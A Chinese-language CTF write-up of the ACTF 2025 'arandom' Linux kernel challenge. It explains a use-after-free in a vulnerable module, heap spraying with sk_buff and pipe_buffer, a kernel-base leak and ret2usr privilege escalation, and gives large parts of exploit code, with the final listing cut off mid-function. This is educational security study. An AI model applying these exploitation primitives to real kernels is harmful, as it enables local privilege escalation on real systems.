[ACTF 2025] arandom复现

本文总阅读量

最近复现的一个很随机的内核题,感觉学到了很多东西,特此记录一下

防护检查

题目给了Kconfig,从中我们可以得到该内核版本为Linux 6.14.2,算很新的内核了,之前的很多手法大概率都会失效

启动脚本开启了kaslr,ban掉了io_uring,但是没有开启smep/smap,意味着可以打ret2usr,仅需泄漏内核地址+控制内核执行流即可提权

原赛题出题人/etc目录权限搞错了,导致可以自己造一个伪/etc/passwd然后大大方方登陆root非预期

内核题搞错权限见过很多次了,但是我没有一次在赛时发现过 :(

逆向分析

题目包含了一个漏洞模块arandom.ko。逆向分析逻辑很简单,最主要的函数是arandom_ioctl:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
__int64 __fastcall arandom_ioctl(file *file, unsigned int a2, __int64 a3)
{
__int64 v4; // rax
__int64 v5; // r12
__int64 rand_offset; // rax

mutex_lock(&arandom_mutex);
if ( a2 == 4099 )
{
v5 = -1LL;
if ( allocated )
{
rand_offset = AAA.rand_offset;
v5 = -22LL;
if ( rand_offset + 4 <= (unsigned __int64)AAA.rand_size )
{
v5 = 0LL;
*(_DWORD *)((char *)buffer + rand_offset) = AAA.rand_value;
}
}
}
else
{
if ( a2 > 0x1003 )
{
if ( a2 == 4100 )
{
v5 = -14LL;
if ( copy_to_user(a3, &AAA, 12LL) )
goto out;
goto LABEL_6;
}
if ( a2 == 0x1005 )
{
v4 = AAA.rand_offset;
if ( *(_QWORD *)((char *)buffer + v4) == AAA.rand_value
&& v4 == *(_QWORD *)((char *)buffer + v4 + 16)
&& *(_QWORD *)((char *)buffer + v4 + 24) == AAA.rand_size )
{
*(_QWORD *)((char *)buffer + v4 + 32) = &get_random_bytes;
}
LABEL_6:
v5 = 0LL;
goto out;
}
LABEL_24:
v5 = -25LL;
goto out;
}
if ( a2 == 4097 )
{
v5 = -1LL;
if ( !allocated )
{
buffer = (void *)_kmalloc_noprof(AAA.rand_size, 3264LL);
if ( buffer )
{
allocated = 1;
v5 = 0LL;
}
else
{
v5 = -12LL;
}
}
}
else
{
if ( a2 != 4098 )
goto LABEL_24;
v5 = -1LL;
if ( allocated && !freed )
{
v5 = 0LL;
kfree(buffer);
freed = 1;
}
}
}
out:
mutex_unlock(&arandom_mutex);
return v5;

有一个很明显的UAF,但是只能使用一次;还有一个地址泄漏,不过需要构造条件。其中全局变量AAA的类型如下所示:

1
2
3
4
5
6
struct arandom_params // sizeof=0xC
{
u32 rand_size;
u32 rand_offset;
u32 rand_value;
};

其在初始化的时候被赋予了随机变量:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
int __cdecl arandom_init()
{
u32 v0; // eax

get_random_bytes(&AAA, 4LL);
v0 = AAA.rand_size & 0x7FFF;
if ( (AAA.rand_size & 0x7FFF) == 0 )
v0 = 0x8000;
AAA.rand_size = v0;
get_random_bytes(&AAA.rand_offset, 4LL);
AAA.rand_offset %= (unsigned __int64)AAA.rand_size - 4;
get_random_bytes(&AAA.rand_value, 4LL);
misc_register(&arandom_miscdev);
return 0;
}

可以看出这是一个非常随机的题,申请随机大小的heap,并在随机位置写入随机字节(但是长度固定为DWORD)
仔细分析发现,rand_size的范围在0x0000~0x7FFF之间,而且有一半的概率落在0x7xxx的范围内;
这个大小在kmalloc中会进入__kmalloc_large_noprof函数(其实大于两个页的size(0x2000)就会触发了),并会进一步进入函数___kmalloc_large_node,最终调用函数alloc_pages_node_noprof,直接从buddy system中申请对应order的页

0x7xxx大小对应的为order-3的页分配,这会一次性返回(2^3=)8个页

下面我们就假设申请的size为0x7xxx,即在触发order-3页分配的情况下进行进一步的利用(此时成功率大约在75%左右)

事实上,size在0x4000~0x7xxx大小之间的size都满足要求,所以成功率还要高一些

要利用UAF,我们首先要将其kfree掉。通过__kmalloc_large_noprof函数得到的heap,在kfree的时候会直接触发page free,从而再次回到buddy system的order-3里边去
因此,我们就从order-3 page(size 0x8000)开始寻找利用手段

漏洞利用

寻找堆喷对象

要取出order-3的page其实有挺多办法的,除了嗯喷pipe_buffer从order-0一路取到order-3之外,我们也可以通过申请新的对应大小的slab来正好取走这个order-3

在第一步选用pipe_buffer需要堆喷大量的pipe,很容易超出最大文件打开限制(即使在修改rlimit的情况下)

通过查看/proc/slabinfo中的内容,我们可以了解到不同的slab的信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
bash-5.2# cat /proc/slabinfo | tail -n 15
kmalloc-8k 8 8 8192 4 8 : tunables 0 0 0 : slabdata 2 2 0
kmalloc-4k 80 80 4096 8 8 : tunables 0 0 0 : slabdata 10 10 0
kmalloc-2k 176 176 2048 8 4 : tunables 0 0 0 : slabdata 22 22 0
kmalloc-1k 344 344 1024 8 2 : tunables 0 0 0 : slabdata 43 43 0
kmalloc-512 392 392 512 8 1 : tunables 0 0 0 : slabdata 49 49 0
kmalloc-256 496 496 256 16 1 : tunables 0 0 0 : slabdata 31 31 0
kmalloc-128 320 320 128 32 1 : tunables 0 0 0 : slabdata 10 10 0
kmalloc-64 1152 1152 64 64 1 : tunables 0 0 0 : slabdata 18 18 0
kmalloc-32 1197 1280 32 128 1 : tunables 0 0 0 : slabdata 10 10 0
kmalloc-16 1280 1280 16 256 1 : tunables 0 0 0 : slabdata 5 5 0
kmalloc-8 1536 1536 8 512 1 : tunables 0 0 0 : slabdata 3 3 0
kmalloc-192 1050 1050 192 21 1 : tunables 0 0 0 : slabdata 50 50 0
kmalloc-96 3780 3780 96 42 1 : tunables 0 0 0 : slabdata 90 90 0
kmem_cache_node 192 192 64 64 1 : tunables 0 0 0 : slabdata 3 3 0
kmem_cache 160 160 256 16 1 : tunables 0 0 0 : slabdata 10 10 0

该信息的部分格式如下:

1
# name            <active_objs> <num_objs> <objsize> <objperslab> <pagesperslab> ...

我们聚焦第六行的<pagesperslab>,该项代表了每一个slab需要的page。可以发现kmalloc-4k和kmalloc-8k正好满足order-3 page(8页)的需求,因此我们尝试堆喷大小为0x1000(即kmalloc-4k)的结构体来触发allocate_slab函数,最终在函数alloc_slab_page中进行直接的order-3页分配

错误的堆喷对象:struct msg_msg

事实上,我的第一反应就是struct msg_msg结构体,因为它kmalloc一次申请的大小最大就是0x1000,于是尝试堆喷struct msg_msg

1
2
3
4
5
6
7
8
9
10
11
12
13
void spray() {
#define MSG_NUM 56
int ms_qid[PRE_MSG_NUM];
char *msg_buf = (char *)malloc(0x1000);
char *msg_recv = (char *)malloc(0x1000);

for (int i = 0; i < MSG_NUM; ++i) {
ms_qid[i] = get_msg_queue();
memset(msg_buf, (char)i, 0x1000);
check(write_msg(ms_qid[i], pre_msg_buf, 0x1000 - 0x30, 1));
}
success("pre spray msg_msg successfully\n");
}

一开始是没问题的,甚至不需要刻意喷射很多的结构体,一般第一波就能取到kfree后order-3 pages,通过UAF,我们可以构造条件满足arandom_ioctl中的要求,从而拿到内核基址绕过kaslr

之后问题来了,下一步我打算将struct msg_msg free掉,换成pipe_buffer来利用其随机任意写,却发现无论如何也堆喷不中。

最后在源码处发现问题,原来该内核版本中struct msg_msg的第一页的分配使用的是自己独立的kmem_cache:

该特性其实在Linux v6.11版本就引入了

v6.14.2 完整版link
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
static struct msg_msg *alloc_msg(size_t len)
{
struct msg_msg *msg;
struct msg_msgseg **pseg;
size_t alen;

alen = min(len, DATALEN_MSG);
msg = kmem_buckets_alloc(msg_buckets, sizeof(*msg) + alen, GFP_KERNEL);
// 这里不是kmalloc了
if (msg == NULL)
return NULL;

msg->next = NULL;
msg->security = NULL;

len -= alen;
pseg = &msg->next;
while (len > 0) {
struct msg_msgseg *seg;

cond_resched();

alen = min(len, DATALEN_SEG);
seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT);
// 这里仍然是kmalloc,但是我们很难利用
if (seg == NULL)
goto out_err;
*pseg = seg;
seg->next = NULL;
pseg = &seg->next;
len -= alen;
}

return msg;

out_err:
free_msg(msg);
return NULL;
}

其中msg_buckets的定义就在其上方:

1
2
3
4
5
6
7
8
9
10
11
static kmem_buckets *msg_buckets __ro_after_init;

static int __init init_msg_buckets(void)
{
msg_buckets = kmem_buckets_create("msg_msg", SLAB_ACCOUNT,
sizeof(struct msg_msg),
DATALEN_MSG, NULL);

return 0;
}
subsys_initcall(init_msg_buckets);

在slabinfo里边其实也有体现:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
bash-5.2# cat /proc/slabinfo
...
msg_msg-8k 0 0 8192 4 8 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-4k 0 0 4096 8 8 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-2k 0 0 2048 8 4 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-1k 0 0 1024 8 2 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-512 0 0 512 8 1 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-256 0 0 256 16 1 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-128 0 0 128 32 1 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-64 0 0 64 64 1 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-32 0 0 32 128 1 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-16 0 0 16 256 1 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-8 0 0 8 512 1 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-192 0 0 192 21 1 : tunables 0 0 0 : slabdata 0 0 0
msg_msg-96 0 0 96 42 1 : tunables 0 0 0 : slabdata 0 0 0
...

可见多了和一般kmalloc-xxx一样的不同大小的slab,意味着它们不会与相同大小的kmalloc-xxx合并了,之前的想法属于cross-cache,除非构造cross-cache attack,否则是不可能成功的

更换堆喷对象:struct sk_buff

为此专门看了一眼源码,确保是kmalloc了之后才采用的

同样能完成读写数据的可供堆喷的结构体还有struct sk_buff,我们不能在一棵树上吊死

还是之前的思路,堆喷取数据验证,然后写数据满足条件,拿到内核基地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
...
// INFO: Step 0x02: spray sk_buff
step("spray sk_buff");
#define SOCKET_NUM 8
#define SK_BUFF_NUM 10
const uint64_t skb_reserve_size = 320;
const uint64_t skb_size = page_size - skb_reserve_size;

int sk_sockets[SOCKET_NUM][2];
char *skb_buf = (char *)malloc(0x1000);

for (int i = 0; i < SOCKET_NUM; i++) {
check(socketpair(AF_UNIX, SOCK_STREAM, 0, sk_sockets[i]));
memset(skb_buf, (char)i, skb_size);
memcpy(skb_buf, "hamoood", 0x8);
memset(skb_buf + offset, 0, 0x20);
memcpy(skb_buf + offset, &AAA.rand_value, 0x4);
memcpy(skb_buf + offset + 0x10, &AAA.rand_offset, 0x4);
memcpy(skb_buf + offset + 0x18, &AAA.rand_size, 0x4);

for (int j = 0; j < SK_BUFF_NUM; ++j) {
check(write(sk_sockets[i][0], skb_buf, skb_size));
}
}
success("spray sk_buff successfully\n");

// INFO: Step 0x03: check & read sk_buff
step("check & read sk_buff");
char *skb_recv = (char *)malloc(0x1000);

check(ioctl(fd, 0x1005)); // check
info("check buffer\n");

info("read sk_buff length %#x\n", offset);

for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; ++j) {
check(read(sk_sockets[i][1], skb_recv, skb_size));

uint64_t possible_addr = *(uint64_t *)(skb_recv + offset + 0x20);
if ((possible_addr & 0xffffffff00000000) == 0xffffffff00000000) {
success("find kernel addr at No.%d: %#lx\n", i,
*(uint64_t *)(skb_recv + offset + 0x20));
kernel_base = possible_addr - calc(0xffffffff81907850);
success("find kernel base: %#lx\n", kernel_base);
goto FIND;
}
}
}
if (kernel_base == 0) {
err_exit("not found");
}
...

其实这种堆喷在结构体AAArand_size满足kmalloc-4k的时候依旧管用,稍微增加了一点成功率

依旧不用喷射很多对象就可以拿到该order-3。接下来就是将其free掉,换pipe_buffer上场尝试控制执行流

控制执行流:struct pipe_buffer

之前说过,在没有smep/smap的情况下,只要能让执行流导向用户空间,我们就能get root(当然前提是拿到基地址)。
因此,pipe_buffer这一可控大小,能够被劫持控制流(只需劫持函数表struct pipe_buf_operations *ops),且内容重复(为0x28大小的结构体数组),随机命中率高的结构体就自然而然地成为这一步利用的首选结构体

太适合了

struct sk_buff在读完数据后自动kfree,而我取数据的方法就是将其读空,因此不需要额外操作将其free掉

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
FIND:
// INFO: Step 0x04: spray pipe_buffer
step("spray pipe_buffer");

struct pipe_buffer {
void *page;
unsigned int offset, len;
void *ops;
unsigned int flags;
unsigned long private;
} pipe_example;

pipe_example.page = (void *)0xffffea0000000000;
pipe_example.len = 0x1000;
pipe_example.offset = 0x0;
pipe_example.ops = (void *)calc(0xffffffff8222bb80);
pipe_example.ops = NULL;
pipe_example.flags = 0x10;
pipe_example.private = 0x0;

const size_t pipe_buffer_size = sizeof(struct pipe_buffer);

info("pipe_buffer size: %#lx\n", pipe_buffer_size);

const uint64_t pipe_num = 0x10;
const uint64_t pipe_buf_size = page_size;

uint32_t inner_pipe_offset = offset % pipe_buffer_size;

char *pipe_buf = malloc(pipe_buf_size);
int pipe_fd[pipe_num][2];
// anon_pipe_buf_ops
for (int i = 0; i < pipe_num; ++i) {
check(pipe(pipe_fd[i]));
memset(pipe_buf, i, pipe_buf_size);
memcpy(pipe_buf, "find__me", 0x8);
check(write(pipe_fd[i][1], pipe_buf, pipe_buf_size));
check(fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 64));

for (int j = 0; j < 0x1; ++j) {
memset(pipe_buf + 0x8, j, 0x8);
check(write(pipe_fd[i][1], pipe_buf, 0x1000));
}
}
success("spray pipe_buffer successfully\n");

堆喷pipe_buffer并将其大小改成适合kmalloc-4k的,也是不需要很多就能取到刚被free的sk_buff

最后一步就是回归最初的arandom_ioctl,调用其随机写的功能,尝试劫持控制流
其实就是一个很碰运气的过程,要求是只要能够将pipe_buffer.ops域覆写成一个用户态地址即可,在用户态我们直接mmap伪造其函数表导向提权代码即可
如果真碰运气中了,只需将其close掉就能触发了

原理就是pipe_buffer在close的过程中会调用函数free_pipe_info,其关键内容如下:

1
2
3
4
5
6
7
...
for (i = 0; i < pipe->ring_size; i++) {
struct pipe_buffer *buf = pipe->bufs + i;
if (buf->ops)
pipe_buf_release(pipe, buf);
}
...

可见,它不管你其他地方有没有数据,只要ops域不为0,就尝试调用(该循环还是遍历所有pipe_buffer结构体数组的)
因此,只要往上边写上东西,就能劫持控制流了

最后一部分

其实这个随机验证是否覆写pipe_buffer.ops域完全可以放在最前边

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
// INFO: Step 0x05: write random value
step("write random value");

info("inner pipe offset: %#x\n", inner_pipe_offset);
info("before writting:\n");
dump_hex((char *)&pipe_example, 0x28);

memcpy((char *)(&pipe_example) + inner_pipe_offset, &AAA.rand_value, 0x4);

check(ioctl(fd, 0x1003)); // write
info("write buffer+%#x <- %#x\n", AAA.rand_offset, AAA.rand_value);

info("after writting:\n");
dump_hex((char *)&pipe_example, 0x28);

void *fake_ops = pipe_example.ops;
void *fake_ops_page = (void *)((uint64_t)fake_ops & 0xFFFFFFFFFffff000);
uint32_t fake_ops_page_offset = ((uint64_t)fake_ops & 0xfff);

if (pipe_example.ops == NULL) {
err_exit("Useless write");
}

success("affect pipe_buffer's ops successfully\n");
success("pipe_buffer's ops: %p\n", pipe_example.ops);

info("mmap page %p\n", fake_ops_page);
void *mmap_page = mmap(fake_ops_page, 0x3000, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

if (mmap_page != fake_ops_page) {
err_exit("mmap error");
}

// INFO: Step 0x06: close pipes
step("close pipes");

// ffffffff812c8d40 T commit_creds
// ffffffff812c8fd0 T prepare_kernel_cred
commit_creds = (void *)calc(0xffffffff812c8d40);
prepare_kernel_cred = (void *)calc(0xffffffff812c8fd0);
init_cred = (void *)calc(0xffffffff82a54120);

uint64_t win_addr = (uint64_t)win;
info("win address: %#lx\n", win_addr);

for (int i = 0; i < 0x80; ++i) {
memcpy(fake_ops + i * 8, &win_addr, 0x8);
}

for (int i = 0; i < pipe_num; ++i) {
check(close(pipe_fd[i][0]));
check(close(pipe_fd[i][1]));
}

shell();

成功get root

叠了这么多随机因素,最终的成功率确实大打折扣,试了一下大概不到1/40的样子

get root :)

再贴个刷出来的极低概率情况

???

总结

这次复现给我阅读了大量源码(太痛苦了),但总算对Kernel内存管理机制入门了,之前各种疑惑点都得到了合理的解释,感觉通透了很多

终于悟了

最终Exp(部分)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
#include <stddef.h>
#define _GNU_SOURCE
#include "./klog.h"
#include <arpa/inet.h>
#include <fcntl.h>
#include <keyutils.h>
#include <linux/if_packet.h>
#include <linux/userfaultfd.h>
#include <net/if.h> // 添加 if_nametoindex 函数的头文件
#include <poll.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <threads.h>
#include <unistd.h>

#define TTY_MAGIC 0x200005401

#define KERNCALL __attribute__((regparm(3)))

void dump_hex(const char *restrict hex, size_t len) {
size_t i, cnt;
size_t res = len % 0x10;
size_t times = len / 0x10 + (res ? 0x1 : 0);

size_t __len = (len & (~0xf)) + (res ? 0x10 : 0);
char *str = (char *)malloc(__len);
char *__hex = (char *)malloc(__len);
memset(str, 0, __len);
memcpy(str, hex, len);
memcpy(__hex, str, __len);
for (size_t l = 0; l < __len; ++l) {
if (l >= len || hex[l] < ' ' || hex[l] >= 0x7f) {
str[l] = '.';
}
}
char str1[0x9], str2[0x9];

for (i = 0, cnt = 0; i < times; ++i) {
memcpy(str1, str + cnt * 0x8, 0x8);
memcpy(str2, str + (cnt + 1) * 0x8, 0x8);
info("0x%04lx: 0x%016lx 0x%016lx %s %s\n", i * 0x10,
((uint64_t *)__hex)[cnt], ((uint64_t *)__hex)[cnt + 1], str1, str2);
cnt += 2;
}
free(str);
return;
}

void *(*prepare_kernel_cred)(void *)KERNCALL = (void *)0xffffffff81116130;
void (*commit_creds)(void *) KERNCALL = (void *)0xffffffff81115e60;
void *init_cred;

// cat /proc/kallsyms | grep "prepare_kernel_cred"
// sudo cat /proc/buddyinfo
// sudo cat /proc/pagetypeinfo

/*
* @fd openthe device;
* @fd_tty openthe ptmx;
*/
int fd, fd_tty;

uint64_t user_cs, user_ss, user_rflags, user_sp;
uint64_t kernel_base, canary;

size_t page_size;
size_t *physmap_spray_arr[16000];
// uint64_t heap_address = 0;

unsigned long long int calc(unsigned long long int addr) {
return addr - 0xffffffff81000000 + kernel_base;
}

static pthread_t monitor_thread;

void register_userfaultfd(void *addr, unsigned long len,
void *(*handler)(void *)) {
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
int s;

/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1)
err_exit("userfaultfd");

uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
err_exit("ioctl-UFFDIO_API");

uffdio_register.range.start = (unsigned long)addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
err_exit("ioctl-UFFDIO_REGISTER");

s = pthread_create(&monitor_thread, NULL, handler, (void *)uffd);
if (s != 0)
err_exit("pthread_create");
}

void win() { commit_creds(init_cred); }

void shell() {

if (!getuid()) {
success("[=============================================]\n");
success("[===================" GREEN "SUCCESS" END
"===================]\n");
success("[=============================================]\n");
system("/bin/sh");
} else {
err_exit("*** root failed ***");
}

for (;;) {
}
}

// data for copy
uint64_t page[0x1000];

static void *fault_handler_thread(void *arg) {
static struct uffd_msg msg;
static int fault_cnt = 0;
long uffd;

struct uffdio_copy uffdio_copy;
ssize_t nread;

uffd = (long)arg;

for (;;) {
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);

/*
* 当 poll 返回时说明出现了缺页异常
* 你可以在这里插入一些比如说 sleep() 一类的操作
*/
success("enter the fault handler\n");

fd_tty = open("/dev/ptmx", O_RDWR | O_NOCTTY);

if (nready == -1)
err_exit("poll");

nread = read(uffd, &msg, sizeof(msg));

if (nread == 0)
err_exit("EOF on userfaultfd!\n");

if (nread == -1)
err_exit("read");

if (msg.event != UFFD_EVENT_PAGEFAULT)
err_exit("Unexpected event on userfaultfd\n");

uffdio_copy.src = (unsigned long)page;
uffdio_copy.dst =
(unsigned long)msg.arg.pagefault.address & ~(page_size - 1);
uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
err_exit("ioctl-UFFDIO_COPY");
}
}
#ifndef ETH_P_ALL
#define ETH_P_ALL 0x0003
#endif
void packet_socket_rx_ring_init(int s, unsigned int block_size,
unsigned int frame_size, unsigned int block_nr,
unsigned int sizeof_priv,
unsigned int timeout) {
int v = TPACKET_V3;
int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
if (rv < 0)
puts("setsockopt(PACKET_VERSION)"), exit(-1);

struct tpacket_req3 req;
memset(&req, 0, sizeof(req));
req.tp_block_size = block_size;
req.tp_frame_size = frame_size;
req.tp_block_nr = block_nr;
req.tp_frame_nr = (block_size * block_nr) / frame_size;
req.tp_retire_blk_tov = timeout;
req.tp_sizeof_priv = sizeof_priv;
req.tp_feature_req_word = 0;

rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
if (rv < 0)
puts("setsockopt(PACKET_RX_RING)"), exit(-1);
}
int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
unsigned int block_nr, unsigned int sizeof_priv,
int timeout) {
int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0)
puts("socket(AF_PACKET)"), exit(-1);

packet_socket_rx_ring_init(s, block_size, frame_size, block_nr, sizeof_priv,
timeout);

struct sockaddr_ll sa;
memset(&sa, 0, sizeof(sa));
sa.sll_family = PF_PACKET;
sa.sll_protocol = htons(ETH_P_ALL);
sa.sll_ifindex = if_nametoindex("lo");
sa.sll_hatype = 0;
sa.sll_pkttype = 0;
sa.sll_halen = 0;

int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
if (rv < 0)
puts("bind(AF_PACKET)"), exit(-1);

return s;
}
int pagealloc_pad(int count, int size) {
return packet_socket_setup(size, 2048, count, 0, 100);
}

void hexdump(uint64_t *payload, size_t len) {
for (int i = 0; i < len; ++i) {
printf("%d:\t%#lx\n", i, payload[i]);
}
}

struct list_head {
uint64_t next;
uint64_t prev;
};

struct msg_msg {
struct list_head m_list;
uint64_t m_type;
uint64_t m_ts;
uint64_t next;
uint64_t security;
};

struct msg_msgseg {
uint64_t next;
};

/*
struct msgbuf {
long mtype;
char mtext[0];
};
*/

int get_msg_queue(void) { return msgget(IPC_PRIVATE, 0666 | IPC_CREAT); }

int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

/**
* the msgp should be a pointer to the `struct msgbuf`,
* and the data should be stored in msgbuf.mtext
*/
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
((struct msgbuf *)msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz, 0);
}

/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
return msgrcv(msqid, msgp, msgsz, msgtyp,
MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

void build_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next,
uint64_t security) {
msg->m_list.next = m_list_next;
msg->m_list.prev = m_list_prev;
msg->m_type = m_type;
msg->m_ts = m_ts;
msg->next = next;
msg->security = security;
}

void save_stat() {
asm volatile("movq %%cs, %0;"
"movq %%ss, %1;"
"movq %%rsp, %2;"
"pushfq;"
"popq %3;"
: "=r"(user_cs), "=r"(user_ss), "=r"(user_sp), "=r"(user_rflags)
:
: "memory");
}

void templine() {
commit_creds(prepare_kernel_cred(0));
asm("pushq %0;"
"pushq %1;"
"pushq %2;"
"pushq %3;"
"pushq $shell;"
"pushq $0;"
"swapgs;"
"popq %%rbp;"
"iretq;" ::"m"(user_ss),
"m"(user_sp), "m"(user_rflags), "m"(user_cs));
}
void bind_cpu(int core) {
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

void unshare_setup(void) {
char edit[0x100];
int tmp_fd;

if (unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET))
err_exit("FAILED to create a new namespace");

tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);

tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);
}

void __always_inline pt_reg(int fd, char *buffer) {
__asm__ __volatile__("movq $0xbeefdead, %%r15;"
"movq $0x11111111, %%r14;" // 0x78
"movq $0x22222222, %%r13;"
"movq $0x33333333, %%r12;"
"movq $0x66666666, %%r11;"
"movq $0x77777777, %%r10;"
"movq $0x88888888, %%r9;"
"movq $0x99999999, %%r8;"
"movq $0xaaaaaaaa, %%rcx;"
"xorq %%rdi, %%rdi;"
"movl %0, %%edi;"
